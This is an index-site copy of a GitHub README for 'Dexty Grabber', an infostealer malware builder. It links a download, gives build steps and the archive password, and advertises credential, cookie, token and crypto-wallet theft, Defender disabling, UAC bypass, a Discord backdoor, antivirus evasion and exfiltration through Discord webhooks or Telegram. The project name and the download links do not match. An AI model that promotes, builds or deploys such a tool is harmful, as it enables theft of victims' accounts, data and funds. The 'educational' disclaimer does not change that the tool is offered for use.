Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/xdexty0/dexty-grabber
https://github.com/xdexty0/dexty-grabber
antivirus antivirus-evasion bot dexty dextygrabber discord discordapp grabber grabbertokengrabber hacking logger password stealer token undetected-grabberr undetected-stealer virustotal
Last synced: about 1 month ago
JSON representation
- Host: GitHub
- URL: https://github.com/xdexty0/dexty-grabber
- Owner: xdexty0
- License: mit
- Created: 2023-10-07T13:44:32.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2024-08-30T18:45:53.000Z (2 months ago)
- Last Synced: 2024-10-13T01:41:17.827Z (about 1 month ago)
- Topics: antivirus, antivirus-evasion, bot, dexty, dextygrabber, discord, discordapp, grabber, grabbertokengrabber, hacking, logger, password, stealer, token, undetected-grabberr, undetected-stealer, virustotal
- Language: Python
- Homepage:
- Size: 56.6 KB
- Stars: 3
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
Dexty Grabber
Discord server: https://discord.gg/wGX26mQkhf
Telegram server: https://t.me/dexty34
## Project Status: Coming to an End
Dear contributors and users,
I hope this message finds you all well. I wanted to take a moment to share an important update regarding this project.
Over the past year, we've worked together to build and improve this project. It has been an incredible journey, and I'm immensely grateful for all the contributions, feedback, and support from each one of you. This project has not only helped me improve my Python skills but has also been a great opportunity to explore and learn more about computer systems.
However, as the saying goes, all good things must come to an end. As I approach the final year of my school journey, I find myself needing to focus on my academic responsibilities and make room for new opportunities ahead. Therefore, I have decided to step back from actively maintaining this project.
I want to express my sincere appreciation to everyone who has participated in this project, be it through code contributions, issue reporting, or offering valuable insights. Your involvement has been the driving force behind the project's success.
I'm happy to announce that noahmajors, one of the contributors to this project, has taken the initiative to fork the repository and continue its development.
I encourage you all to show your support to noahmajors and the new direction they will take the project. Please consider contributing to the fork if you are interested in its future development.
While this marks the end of my direct involvement with this project, I sincerely hope that the codebase and knowledge shared here will continue to benefit the community.
Thank you all once again for being part of this journey. I wish you all the best in your endeavors and hope our paths may cross again in the future.
Best regards,
dexty## Table of Contents
- [Download](#download)
- [Features](#features)
- [Stub Settings](#stub-settings)
- [Requirements](#requirements)
- [How to Build?](#how-to-build)
- [Support the Project](#support-the-project)## Download
[![Download](https://img.shields.io/badge/Download-Now-Green?style=for-the-badge&logo=appveyor)](https://github.com/waltuhium/Waltuhium-Grabber/archive/refs/heads/main.zip)
**Disclaimer:** This program is provided for educational and research purposes only. The creator of this program does not condone or support any illegal or malicious activity, and will not be held responsible for any such actions taken by others who may use this program. By downloading or using this program, you acknowledge that you are solely responsible for any consequences that may result from the use of this program.
**Note:** If the grabber fails to function, attempt rebuilding it without enabling the "Anti VM" option.
**Note 2:** To decrease the chances of detections, you can download [MingGW-w64 (with GCC)](https://github.com/niXman/mingw-builds-binaries/releases/download/13.1.0-rt_v11-rev1/x86_64-13.1.0-release-win32-seh-msvcrt-rt_v11-rev1.7z) and include the "bin" folder in the PATH variable.
## Features
• GUI Builder.
• UAC Bypass.
• Custom Icon.
• Runs On Startup.
• Disables Windows Defender.
• Anti-VM.
• Blocks AV-Related Sites.
• Melt Stub.
• Fake Error.
• EXE Binder.
• File Pumper.
• Obfuscated Code.
• Discord Injection.
• Steals Discord Tokens.
• Steals Steam Session.
• Steals Epic Session.
• Steals Uplay Session.
• Steals Passwords From Many Browsers.
• Steals Cookies From Many Browsers.
• Steals History From Many Browsers.
• Steals Autofills From Many Browsers.
• Steals Minecraft Session Files.
• Steals Telegram Session Files.
• Steals Crypto Wallets.
• Steals Roblox Cookies.
• Steals Growtopia Session.
• Steals IP Information.
• Steals System Info.
• Steals Saved Wifi Passwords.
• Steals Common Files.
• Captures Screenshot.
• Captures Webcam Image.
• Sends All Data Through Discord Webhooks/Telegram Bot.
(...more)## Stub Settings
| Option | Description |
| ------ | ----------- |
| **Ping Me** | Pings [@everyone](https://www.remote.tools/remote-work/discord-everyone-here#what-is-everyone) when someone runs the stub. |
| **Anti VM** | Tries its best to prevent the stub from running on Virtual Machine. |
| **Put On Startup** | Runs the stub on Windows starup. |
| **Melt Stub** | Deletes the stub after use. |
| **Pump Stub** | Pumps the stub upto the provided size. |
| **Fake Error** | Create custom (fake) error. |
| **Block AV Sites** | Blocks AV related sites ([Unblock](https://github.com/waltuhium/Waltuhium-Grabber/issues/117)). |
| **Discord Injection** | Puts backdoor on the Discord client for persistence. |
| **UAC Bypass** | Tries to get administrator permissions without showing any prompt. |# Images
**Supports:** *Windows 8+ (Tested on Windows 10).*## Requirements
**To build the stub, you need:**
- Windows 10.
- Python 3.10+.
- An active internet connection.## How to Build?
1. Download and install [Python 3](https://www.python.org/downloads/) (Make sure to enable the *Add to PATH* option.)
2. Verify the installation by executing `python --version` in [CMD](https://www.howtogeek.com/235101/10-ways-to-open-the-command-prompt-in-windows-10/?).
3. [Download Waltuhium Grabber](#download).
4. [Extract](https://www.pcworld.com/article/394871/how-to-unzip-files-in-windows-10.html#:~:text=Unzip%20all%20files%20in%20a%20ZIP%20file) the zip file.
5. Navigate to the **Dexty Grabber** folder and double click *Builder.bat* file.
6. Fill in the fields of the builder and press the Build button.
7. What is rar/zip password if u dont know its "dexty123" but if u want change this ou can change it from config.json folder[![Tutorial video](https://img.shields.io/badge/Watch-Tutorial-blue?style=for-the-badge&logo=youtube)](https://streamable.com/r9sa14)
## Support the Project
If you find this project useful and would like to show your support, you can make a donation using the following cryptocurrencies:
- **LiteCoin (LTC):**
- Wallet Address: LUddMq5iFyGqJeU2hBSer2a4vU5GwHAa4A